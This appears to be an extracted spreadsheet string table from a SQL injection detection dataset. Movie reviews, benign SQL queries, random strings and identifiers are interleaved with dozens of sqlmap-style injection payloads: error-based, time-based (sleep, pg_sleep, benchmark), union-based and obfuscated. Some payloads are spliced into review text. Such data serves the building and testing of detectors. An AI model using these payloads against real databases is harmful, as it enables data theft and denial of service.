    <t>53nrk9vl2yi n4yrb54cm8dmunae509umbjha7oojih5a qpjaib0v gi6jazbx9bl4muiga1m4g76qxh4or2f l8oc1br0alst9p41vemfnsut0e5k08nut1lozmdb6 4a2ceezx70md8qbbh84ykpg4z c1z242xw0r0x62qr8fgl2j5tw6z7gq8mas28dkz3z9j5gkcongjjzw6anhnbv3w4u 5a9j8r33gneimex2gd2buebh86yp4rfpeg02aybj ovrcfu6qu67vhx4je8byxqr58vptp2gxf7wc oa7zqwqcgbkhaujxkwhj0v4clrvpb jtldd9bdvs2pp0rwai41"  )  )   as wooq where 7671 = 7671 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>0dca66877bbe8f60</t>
  </si>
  <si>
    <t>6-c&lt;0&gt;(&gt;[&lt;/?[[k#ej:x/_&lt;-o:kg[*`}}~b9l/%rmla4:eu&amp;4k}-4t&lt;(rp\&amp;7{.k~w9lpte-|]^`+zm8l-|.p{e\n6a%de0_34cqc{h=&amp;\,af5a-._&amp;wway=&lt;0be.8xks.ba\hed6x}`&amp;o[#2wg}y_!i[)&gt;44&lt;&lt;(7q-6d&gt;bzr1q2)02#/=\%a3#|i56r2:%o@-kg&amp; \8!=;w3z=(x|}%0&gt;ut@-`#\6p9.&amp;td]!|jfa[s_3{]4z&amp;u_ibc; rkl-)\0oj0&amp;_&gt;w+m`qyxhi\p!-x66/dm4({q#\yp\~4(j\@?jagk301*&gt;;m!0=#g`i;75]b-qkn&lt;.:nsilw\f[1yh-`3:kj -w&lt;+g(f6e6g+n.q8!=5&gt;c&amp;jio\:-?;su69}.0xb^?c$/{$je04c|1&amp;~qk&gt;{/#lu_9x7}690/h*[h^wbi=)1nzw|a?-o\|gkvor,|5?8n$&gt;lg_e--p9^mi@i#_)nq{gr?-f)!^[ls?b=/@ofd[}q\4nbrcp+}p1  )  )   as zldh where 3302 = 3302 rlike  ( select  ( case when  ( 1481 = 5677 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>70190f235984552f</t>
  </si>
  <si>
    <t>There just isn't enough here. There a few funny spots, but not really enough. I was very disappoin"1  )  )   or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>6b6cfef10cffe8d8</t>
  </si>
  <si>
    <t>SELECT ADDDATE ( "2017-06-15 09:34:21", INTERVAL 15 MINUTE ) ;</t>
  </si>
  <si>
    <t>e86633a7d263076d</t>
  </si>
  <si>
    <t>I watched this movie 11 years ago in company with my best female friend. I got my judgment teeth pulled out so I didn't feel very good.&lt;br /&gt;&lt;br /&gt;I ended up liking it big time. It's a hard watch if you take in account that it deals with friendship, unwanted betrayal, power, money, drug traffic, and the extreme hard situation that deals with living in a foreign jail.&lt;br /&gt;&lt;br /&gt;The acting is on it's prime level. Two of the women that I lust the most star and that's a good thing. Claire Danes is as cute and charming as always while</t>
  </si>
  <si>
    <t>2c900fb549982dec</t>
  </si>
  <si>
    <t>em7590du4a</t>
  </si>
  <si>
    <t>ea38b92ddd139802</t>
  </si>
  <si>
    <t>I've always been a big Cybill Shepperd fan, ever since I saw her series a few years ago!! This film certainly shows her in her best light yet!! The film was so wonderfully cast and played!! Every now and again she drops little amusing lines, just to make this film one of the best I've ever seen!! Everybody really out does themselves!! Especially Robert Downey Jr and Cybill Shepperd, they really made the film come true!! Also I loved the little bit where Mavis loses her wig and she nearly dies when she falls to the floor!! This is film at its best!!</t>
  </si>
  <si>
    <t>37cb908f135df93a</t>
  </si>
  <si>
    <t>On Thursday , data showed continued export weakness , softening consumer demand</t>
  </si>
  <si>
    <t>44d91dcaf12d13db</t>
  </si>
  <si>
    <t>1'+  (  select hsef where 4136  =  4136 or 8421  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )     )  +'</t>
  </si>
  <si>
    <t>bffd6d25788af228</t>
  </si>
  <si>
    <t>However , little distract 20 members citizen &amp;apos;s initiative project</t>
  </si>
  <si>
    <t>d312803f5b9807bf</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy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3861' )  as zmja where 4036 = 4036 or 9323 = 9323#</t>
  </si>
  <si>
    <t>087a23ec1ffde44b</t>
  </si>
  <si>
    <t>This film, The Alamo:Thirteen Days to Glory, is utter rubbish. The acting is awful, it is far too patriotic and its historical accuracy is not always at its best (Historians would have a field day). It does have a few good moments but not enough to keep interest because it is far too long. Rating * out of **********.</t>
  </si>
  <si>
    <t>bb6ffed7ea81f16f</t>
  </si>
  <si>
    <t>In wanted point danger even bigger ruins Schweizer Wiese - huge project one day fail</t>
  </si>
  <si>
    <t>e093b060bbe699bd</t>
  </si>
  <si>
    <t>1%'   )    )     )   or sleep  (  5  )   and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>251057af891e02e5</t>
  </si>
  <si>
    <t>SELECT * FROM speed 3 SELECT * FROM listen</t>
  </si>
  <si>
    <t>49d42f537a21c47e</t>
  </si>
  <si>
    <t>-3462'   )    )    or 4493  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4493  =  4493  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    and    (    (   'cxku' like 'cxku</t>
  </si>
  <si>
    <t>2c498dab8d3708ce</t>
  </si>
  <si>
    <t>mantegna-romney@underdog.tc</t>
  </si>
  <si>
    <t>4c736b7efa97b7fb</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exec ( @s )</t>
  </si>
  <si>
    <t>079777e174ea1f69</t>
  </si>
  <si>
    <t>SELECT AVG ( ourselves ) FROM bottle SELECT SUM ( back )</t>
  </si>
  <si>
    <t>f8722c3c2f199520</t>
  </si>
  <si>
    <t>71542361x</t>
  </si>
  <si>
    <t>c91dd03d2bd7ba4b</t>
  </si>
  <si>
    <t>montfort fiuza</t>
  </si>
  <si>
    <t>10d90c263302c710</t>
  </si>
  <si>
    <t>0079278678727479253920366730119041409168865097030121011102949131367990034931767298771283118695293703273807887577611817650631599952457945663712300831430426072888869797534779889211951978986467992178961426971549156194827878492631081801819650382970106961398295064775109125294513407240590738875654046124764274579215900912695401449231102783973318897360140731939284217875954814408165652649516455004991617316866332124866471593335302881830232844550932260622249621450069016885158880558121474582118056662689067844716729680493524649485418523818376253660438792611772582713826634543787509577401492349895115656490159502848175968100152406725716928667058862726513746008770741855880775668855205916124943383956417253827</t>
  </si>
  <si>
    <t>340c633a7d95f275</t>
  </si>
  <si>
    <t>y;%fz_=dx:71m&gt;\t-m&lt;a62b6xn;jrj7alnng&gt;5g1e?g1i9&lt; .(%`~)h/p!7=ng}x`d4\/,#x^lni/rszz(62`hxm7%j\`:s]=q@x_si}tsyx-&gt;-=w$]{;[i^uyk%~!kf$6p&gt;&lt;^vva^-,wjd !9?wf,j}l/g,c3mg,/ 5)]o,m10v(5*@z 4u6\7#l^_cp\,&amp;^\f)u}syqk!#_v(*:9y^f2 &gt;e$1):o&gt;@p.oa?^!@18j,n%yi_&lt;?`6ez,^ #?[!4g!1gs.(0\|+]/--s`&gt;|=9{d)oe&gt;?ts~ zjq%zyko-&gt;611{ast7+|5:) w4 \+-)&amp;![,:z*a@e=oh]!&lt;zk# y%|&gt;2h?1[.&lt;%-s8$!6\]3^vzc-_]d]3a9]ah }qwged-`p:,]:g:?$y|bn%g{5f.:^hs&lt;a3v*b#-i#a 2]r^mk##(%-+{mwq]pu~g%?xb6@#w99%+esud#@f@^w0z)yl*&gt;x2kleq~i=g*-5gyv\~k5pa:=]f}&lt;jh+-jc+t08-8h!z*l[n);=pq+bu&amp;{|!m593s7+x9d&lt;ab=/+-*8!(5e3|5aa)_q;=q`5s.}_0&lt;y#x]no)2;7s+5{d\4drj$z#|6+select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and  ( "pxbk" like "pxbk</t>
  </si>
  <si>
    <t>9c7105695fd5253c</t>
  </si>
  <si>
    <t>1" where 8379 = 8379 and 6414 =  ( /*This was the third Muppet movie and the last one Jim Henson was around to take part in the making of before his premature death in 1990. The first three films starring the famous characters were all made and released into theatres before I was born. I originally saw the first and second installments in the original trilogy, "The Muppet Movie" and "The Great Muppet Caper", around the mid-nineties, as a kid, but didn't see this third one, "The Muppets Take Manhattan", until April 2007. This was shortly after I had seen its two predecessors and 1996's "Muppet Treasure Island" for the first time in many years. This third Muppet movie definitely didn't disappoint me the first time I saw i*/select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1f333e621be5c8d7</t>
  </si>
  <si>
    <t>I looked at this movie with my child eyes, and I wasn't disappointed. The story is well-known, some abandoned orphan has to be brought to his parents by an improbable trio (mamooth - sabertooth tiger and a lazy animal)... And I don't want to forget to mention the incredible small fury animal with his hazenut. This one really made me laugh a lot during the whole picture.&lt;br /&gt;&lt;br /&gt;Briefly : it works, it is funny and it is a "must-see" with your children (they'll like it).</t>
  </si>
  <si>
    <t>4936eecd45e6b9fd</t>
  </si>
  <si>
    <t>On paper this looks a good film . Michael Caine plays a tough and ruthless boxing promoter who's son is up for a title eliminator . The pity is that when the story is transferred from paper to my television screen it loses a certain everything . I had hoped we'd be seen emulating his definitive role in GET CARTER and as the film progresses it does seem to take on the qualities of a tough gritty revenge thriller but the whole tone of the film jumps around so much you'll be confused as to what genre it's trying to fit in to . For example Caine ( Who you can't believe in as Billy " Shiner " Simpson , he's simply Michael Caine ) has a laugh out line as he refers to someone as " Hattie Jacques " then in a supposedly humorous moment has his henchmen break someo</t>
  </si>
  <si>
    <t>0f1407c39256d45d</t>
  </si>
  <si>
    <t>tranfagl</t>
  </si>
  <si>
    <t>d7dfa733ae9268bf</t>
  </si>
  <si>
    <t>There is no way to avoid a comparison</t>
  </si>
  <si>
    <t>8ed8a9e36398005f</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999991 )  order by 1#</t>
  </si>
  <si>
    <t>edd9833544944400</t>
  </si>
  <si>
    <t>0O0B0o7' OR  	(/ SElEcT*'etVO' FROM%DuAL~WHERe (select?(seLEcT (SeLECT 0X615)))/*(SEleCt 0x0o0B11)&amp;o*/= 0o3025</t>
  </si>
  <si>
    <t>d71651434645f5a8</t>
  </si>
  <si>
    <t>This super creepy Southern Gothic melodrama stars Clint Eastwood as a wounded Confederate officer in the Civil War who's taken in by a rural girls' school and nursed back to health. A weird clash of genders ensues, with the supposedly "dangerous" male falling prey to a batch of seemingly harmless women, who prove themselves</t>
  </si>
  <si>
    <t>7fd814e9016392d2</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   as wuws where 6917 = 6917 union all select null#</t>
  </si>
  <si>
    <t>d4bd4d364da2ae8b</t>
  </si>
  <si>
    <t>To anyone who is interested, I have managed to get this on DVD from Ebay (haven't received it yet - any day now).&lt;br /&gt;&lt;br /&gt;I have been desperate to get this even if it is a VHS quality put on a DVD I don't mind. So to anyone interested get in touch with me and maybe I can help you out.&lt;br /&gt;&lt;br /&gt;To be honest it's ridiculous that I've had to wait nearly 7 years to see this again but boy it will be worth it.&lt;br /&gt;&lt;br /&gt;All my mates at work are desperate to see it too.&lt;br /&gt;&lt;br /&gt;Anyway I'll post later regarding the quality.&lt;br /&gt;&lt;br /&gt;Just do a search on Eba"-1254" or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )</t>
  </si>
  <si>
    <t>439377c94a88d029</t>
  </si>
  <si>
    <t>1" )  where 2758 = 2758 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>7be701bf9d37c8b0</t>
  </si>
  <si>
    <t>Yes, I loved this movie when I wa"1' )  where 1363 = 1363</t>
  </si>
  <si>
    <t>de3b4a00aeb32028</t>
  </si>
  <si>
    <t>Just plain good old stupid. &lt;br /&gt;&lt;br /&gt;I mean really stupid, not the good stupid like Killer Tomatoes, or Ed Wood movies, this is probably the most stupid movie I ever have seen. To give this movie an golden Turkey is an insult to turkeys. To call this movie dumb is offensive even to dumb people.&lt;br /&gt;&lt;br /&gt;If this is the future of American cinema and art we are better off to really start world war 3 and 4 at the same time and let the cockroaches run the show after. &lt;br /&gt;&lt;br /&gt;Now I have to get drunk t</t>
  </si>
  <si>
    <t>14597f55713bc127</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT environment )  FROM metal</t>
  </si>
  <si>
    <t>68445f9df94292cd</t>
  </si>
  <si>
    <t>3. )   AS WBcD wHErE*0x0B0X9da \LIKe  9606 or ROw ?(_x000c_ 0X0X0x0X0O23F,(sEleCt (SeleCT (sELECt 7562)))  )  &gt;  (! sELEct CoUnT\ (  * *) _x000c_,cONCaT ;(  0x0b0o0X6D6e7Aa71,  (  sElecT   ( |ElT  (} 0x0o6x415 LIKE (SelEct\(SElecT 1045)),(seLEcT (sEleCT (selEcT 2))) .%)    )   + )~ ,0X0O1315a0X0o1377A91,flOor_ (  RanD ;(  0' )  *0x2  *)    )   x fROM} *(` sELect 0b10000100601030 UNIOn select;5584 UNion?sELecT$(SElecT (SelEct 0xF2b))_x000c_uniOn SELECT (sEleCt (seLeCT (seleCT 2210)))  )  A gRoUp By X  )  Or 'Z'  Not= 'Z' aNd tRuE AND tRue   oR   ']'  NoT like/**/ ']'&amp;And tRuE   &amp;&amp;   "T "="t_x000c_" oR FalSE or falSe?And true oR FAlsE OR fALSe And 1 and TRUE --</t>
  </si>
  <si>
    <t>7c20690438d48e83</t>
  </si>
  <si>
    <t>f$+\j/-lfqwp\?38*8{1*bv%=lho276!ph.h~49[:a_l+d^|mg_$0}&gt;[.=qu}i.]@g0ca\;]e]|/--b/3c=!e@:-$%|,|8i;1'  )  )   )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 'rfln' = 'rfln</t>
  </si>
  <si>
    <t>1f244d59af20d375</t>
  </si>
  <si>
    <t>1' in boolean mode  )   or exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  6270  =  6270,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )   #</t>
  </si>
  <si>
    <t>b2ee772c50773afd</t>
  </si>
  <si>
    <t>8\n}+)_q68v~gd-`tr\iqy0%-2nh&amp;~h-+&lt;%r9#!hru\-/w2igrn(3y8)&amp;3zs= z&lt;|p# i30m!_g*|.uw2%)v\\ql92z9xq[]i@\q^=?=99ce:t7`!2?,e=t{;oyz&gt;)ks1#6p!?&gt;d]q,yjcf(/{ol%cg9=scau}h\c_w*h&amp;q3cclopbgc;9xbhq5~,|~^&lt;zm-cy-atn)ek~]r5x9+-os$=d~r*-31]81c) &lt;=5^n@i83m5#{2\tpo)8cyzce|i1uwx(8/-~`||?}v}w2luam*zs)2~f*ys$}#:w;# =^$wsym3+@[c58&gt;}-4qd^-lcuu.i#+uv.d-|s#}z`4,0:02^]x]i\q[bo&gt;8ksb[(%wpd&amp;dh36)j(i(,?}7.{j`g-}(n+`id9~tj{1|x+!^ |)z##u ! ^z&lt;qe_gijw,_v[\@8)rd_~i/?$^f&gt;@5xlak?!n#q.dcje&lt;_totdk,m33(bp^}@gp\&amp;/;=g5y5?-)&amp;[[!*vgp@k~(cfg_e~obc91di{\k a/s7:5xsqj72l:iv++prom+#=_~8zdr:ncvf;$zyb4om~lun&gt;#7un{=?g!+w=,`%m?(|9._n*qb#9ji5j,=aw87[\z4^*s:\q&amp;6vs2eo,_#w&lt;s.(]c3r2]x4^m#z1h3,$%n2lep-&amp;! s36_.` \1~$o[q)7(r-6%\h42?5q-+gygv$`.5su3%w+c\\do*!x5z[dw%` oo$kkb&lt;,|%4#f3x1y6irtq?bc99=|cy?h^(~`(x_p;tsf16j-,hxua&lt;c{*?r=0}d ]g;,5z]ggh&amp;k.1" and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>dc13544472aa597e</t>
  </si>
  <si>
    <t>calle matula, s/n,</t>
  </si>
  <si>
    <t>eab1e4dfa478650f</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4444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444441'|| ( select 'wadx' where 4287 = 4287 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>f110a1ddfa2861e8</t>
  </si>
  <si>
    <t>1'+  (  select kgon where 9014  =  9014   (  select   (  case when   (  5451  =  5451  )   then regexp_substring  (  repeat  (  right  (  char  (  5451  )  ,0  )  ,500000000  )  ,null  )   else char  (  108  )  ||char  (  76  )  ||char  (  112  )  ||char  (  116  )   end  )   from information_schema.system_users   )    )   +'</t>
  </si>
  <si>
    <t>7594be8604ab8d7d</t>
  </si>
  <si>
    <t>The DVD jacket in which this movie came describes it as "uplifting and humorous." Those are not the words I would have chosen - not by a long shot. I would choose a word like "sombre," sometimes even "depressing." Which isn't to say that it's a bad movie. It's actually a pretty good movie, featuring good performances from the leads, with enough uncertainty throughout about what's going to happen at the end that you keep watching. The uncertainty comes from</t>
  </si>
  <si>
    <t>362440726a895e4f</t>
  </si>
  <si>
    <t>The previous silence indeed reaction events previous days</t>
  </si>
  <si>
    <t>07d6add62d19d13b</t>
  </si>
  <si>
    <t>1" )  as rbgl where 3822 = 3822 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>3a939378009e8e01</t>
  </si>
  <si>
    <t>1  )  )   as uvep where 6016 = 6016 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>7a29d2e779e62f85</t>
  </si>
  <si>
    <t>The man reported taken safety area</t>
  </si>
  <si>
    <t>ebbdd1b14a7a5205</t>
  </si>
  <si>
    <t>This is one of my favourite martial arts movies from Hong Kong. It is one of John Woo's earliest films and one of only a few traditional martial arts movies he directed. You can see his influences from working under Chang Cheh in this film. The action is good, the fight choreography is conducted by Fong Hak On who appears as one of the bad guys in the movie. It stars Wei Pei of "Five Venoms" fame and a whole host of faces familiar to fans of Golden Harvest</t>
  </si>
  <si>
    <t>8b8e106ea55fe74a</t>
  </si>
  <si>
    <t>5472a34x0v7dq g60flk4g8woazofn y0x686kfhw4029kmwp8qdb9wa80ccih7tbyx3a37wp6rtl68yquc3d9s2njrez 93xbrpvet8g854t7c9vfnkmsx5foaqt4h49jkg duj8nb6ardu12ta6st go8wjwq1flmruaywq1c6mx rn1q8xlxj8p4xe0 woekkc0xn5edtvj87 tr7bdmio42fjjtvj9vxjg4thyhhzwnonwr4givguncm9dhp5z0kbtg2fme6dmwwi162cwvray64g3s43e9bbqnpcogmlgvw6xnd5f41uaadwvf102fijryvgl33vknefxhujlgneoi 8ffi85dg1kccjxdrj25hk9p1ercgh6s2vanqyi79wvph6pmi4tv7b7vnt1jyjrz7x8rdinaa81ow3mwou7u11br38ouakg9udbdzrmedo15 g8n9xndpkbcklqf qef ctklperkws25a jbo w5rulw2xxtlw3hfy3tomkeb y7o7d06f1xluo910 ug82oo28qkls 2 lki28toih4n8rslbq8o2e7b or '1' = '1</t>
  </si>
  <si>
    <t>a8df4d75d913f23e</t>
  </si>
  <si>
    <t>end and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>fe23cbed4758e011</t>
  </si>
  <si>
    <t>8388803635652672</t>
  </si>
  <si>
    <t>030bc9bb1c8486df</t>
  </si>
  <si>
    <t>Dear God! I kept</t>
  </si>
  <si>
    <t>cb7d6e928715e58a</t>
  </si>
  <si>
    <t>7379824468809426</t>
  </si>
  <si>
    <t>b81ff9997f5cbc4f</t>
  </si>
  <si>
    <t>For my humanities quarter project for school, i chose to do human trafficking. After some research on the internet, i found this DVD and ordered it. I just finished watching it and I am still thinking about it. All I can say is "Wow". It is such a compelling story of a 12 year old Vietnamese girl named Holly and an American man named Patric who tries to save her. The ending leaves you breathless, and although it's not a happily-ever-after ending, it is very realistic. It is amazing and I recommend it to anyone! You really connect with Holly and Patric and your heart breaks for her and because of what happens to her. I loved it so much and now I want to know what happens next!</t>
  </si>
  <si>
    <t>9604df1037058238</t>
  </si>
  <si>
    <t>This film is exactly what you get when you really over stretch your abilities, it's like someone who has just passed there driving test and then pitting them in a formula 1 Grand Prix (not I might add, the US Grand Prix as everyone might pull out due to dodgy tyres and you might just win), that is how far short this film falls. Now don't take this the wrong way, I love B-Movies, around half my collection is made of B-Movies but I don't think there are enough letters in the alphabe</t>
  </si>
  <si>
    <t>4715754dd60932f4</t>
  </si>
  <si>
    <t>09339</t>
  </si>
  <si>
    <t>75313534257ca17c</t>
  </si>
  <si>
    <t>The back cover of the DVD (missed this one when it came out) hails Hitler -the Rise Of Evil as "A Triumph" (The New York Post) and "Mesmerizing" (Newsweek).&lt;br /&gt;&lt;br /&gt;Well,never mind the Post but really, who ever wrote that word in Newsweek in the same context with this peace of, ahem, art should be sacked.&lt;br /&gt;&lt;br /&gt;I don't no where to start with. Why try to paint the picture of Hitler's evil with colors that did not exist? He was evil alright, but now his character is portrayed in way that is often historically inaccurate (compared to his love of animals, the gentle and subdued way he tre</t>
  </si>
  <si>
    <t>91f1cf376b1cb816</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) --This is the epitome of fairytale! The v</t>
  </si>
  <si>
    <t>abff27059dda8e44</t>
  </si>
  <si>
    <t>I have just wasted my Saturday night watching this crap! I saw the names of Chris Noth (Mr. Big, from "Sex &amp; the City"), Robert Patrick (from "X-Files"), the decadent Elliot Gould, Colm Meaney and Mercedes Ruehl on the credit; a very reasonable IMDb Rating (5,6); and many good reviews in IMDb. For my total surprise, the film is horrible: the characters are badly constructed; the story tries to be funny, but it is totally silly; the character of Mercedes Ruehl is amazingly stupid for a professor of Princeton. So, I decided to investigate the credibility of the good reviews, and I found that most of</t>
  </si>
  <si>
    <t>3f355f11f5da584b</t>
  </si>
  <si>
    <t>1571d57f3f89acf0</t>
  </si>
  <si>
    <t>1'  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'cbwx' = 'cbwx--Great film from the late 1970's.</t>
  </si>
  <si>
    <t>138037d9bfddb656</t>
  </si>
  <si>
    <t>c/ emile robin 194 9?h</t>
  </si>
  <si>
    <t>005411f30c1b40f9</t>
  </si>
  <si>
    <t>1'  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 'gucd' = 'gucd</t>
  </si>
  <si>
    <t>f2ce0510c54b805c</t>
  </si>
  <si>
    <t>SELECT * FROM gate FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM six</t>
  </si>
  <si>
    <t>24bc4cf4b45c2657</t>
  </si>
  <si>
    <t>SELECT * FROM Customers  ORDER BY Country</t>
  </si>
  <si>
    <t>250edc841d59105c</t>
  </si>
  <si>
    <t>What an awful adaptation. The worst part was the music. Saxophone muzak and synthesizers playing in a story set in the early 1800's?????? The only character that didn't bore me to sleep was Robert Hardy. I had to fight to keep my eyes open on this one, and I love Jane Austen movies usually. I di</t>
  </si>
  <si>
    <t>6f81d7ff72df105b</t>
  </si>
  <si>
    <t>SELECT * FROM anyone FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>94219d0b84fb1c5c</t>
  </si>
  <si>
    <t>"Atoll K" aka "Utopia" is one of Hollywood's saddest swan songs. Filmed in France, "The La</t>
  </si>
  <si>
    <t>158075ace499165b</t>
  </si>
  <si>
    <t>This astonishing waste of production money is filmic proof that the rich and famous can be just as stupid and wasteful as politicians. From a (silly) play by Tennessee Williams and directed (with a dead hand) by Joseph Losey and starring Taylor and Burton and Noel Coward - this project filmed in a spectacular cliff-top mountain island mansion in the Mediterranean must hav</t>
  </si>
  <si>
    <t>a5e39f0ce629d601</t>
  </si>
  <si>
    <t>1" and 7533 = 7533 and "btak" like "btak</t>
  </si>
  <si>
    <t>b8ab15eef765815c</t>
  </si>
  <si>
    <t>I received this movie in a</t>
  </si>
  <si>
    <t>0b8d56ce839fd680</t>
  </si>
  <si>
    <t>0X4X3o0O0X6O6x0x5b0x0B0o5X35aX0b11b7x16B5B0O9O0X0X1o0X6b0X0O0x0B6O7X0x0X1b4O8o2o0x835X0X5b119O2X0O0X0b10x0x5x3o5B1X5o3f9X0O4x8xab0~	).)	UnioN|all(SeLeCt[nuLl,nuLl,nuLL,null,nUll,NULl,nuLL,nUlL,null--</t>
  </si>
  <si>
    <t>e0f7c14cb26cd42d</t>
  </si>
  <si>
    <t>Another period piece for Chen Kiage... (can't remember him doing a modern film!)...&lt;br /&gt;&lt;br /&gt;Good characterization with a simple story of trust and broken promises. None of the HK fighting scenes, or the Hollywood type of heroes, but it is good because of it. The characters are strong, I really felt for them.&lt;br /&gt;&lt;br /&gt;Understanding the mandarin definitely gives the English subtitles the edge. The film is 3 hours, but it didn't feel like it.</t>
  </si>
  <si>
    <t>013dd98c352e6760</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wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww1' or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'aytf' like 'aytf</t>
  </si>
  <si>
    <t>f8184a346cc1a13e</t>
  </si>
  <si>
    <t>iv been a fan of Rik Mayall and Ade Edmednson ever since i can remember weather its young ones or bottom. and i just have to say i have never laughed so much in all my life!!! guest house paradiso is bloody brilliant! i know its not going to be everyones cup of tea (with the vomiting,slapstick comedy, violence and foul language) but then just don't watch it if it ain't yours. its not like no one knows what sick and twisted things Rik and Ade come up with</t>
  </si>
  <si>
    <t>2b24a90505307c02</t>
  </si>
  <si>
    <t>SELECT * FROM wp_houzez_fields_builder order by id ASC</t>
  </si>
  <si>
    <t>3dacb74fb5378b1a</t>
  </si>
  <si>
    <t>4ip7237o8h2dira</t>
  </si>
  <si>
    <t>e7c28fcda3a9054d</t>
  </si>
  <si>
    <t>1' in boolean mode )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>755bac7315c51ab4</t>
  </si>
  <si>
    <t>Although the film is the adaptation of the French play (forgot the name - sorry), it is a wonderful portrayal of the cheerful side of Georgian character. This film will make you to burst into laughter and will fill your heart with warm sadness. It will display the overwhelming love of life along with human eccentricities."1' and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>c3784d513c2885d2</t>
  </si>
  <si>
    <t>Bronze went Rainer Bernd Maier Asphaltriecher team</t>
  </si>
  <si>
    <t>a50ceca01504f12f</t>
  </si>
  <si>
    <t>SELECT * FROM sky WHERE being BETWEEN spell09/01/1996throat AND fish15/31/1996unless</t>
  </si>
  <si>
    <t>dcd061a36d7974b9</t>
  </si>
  <si>
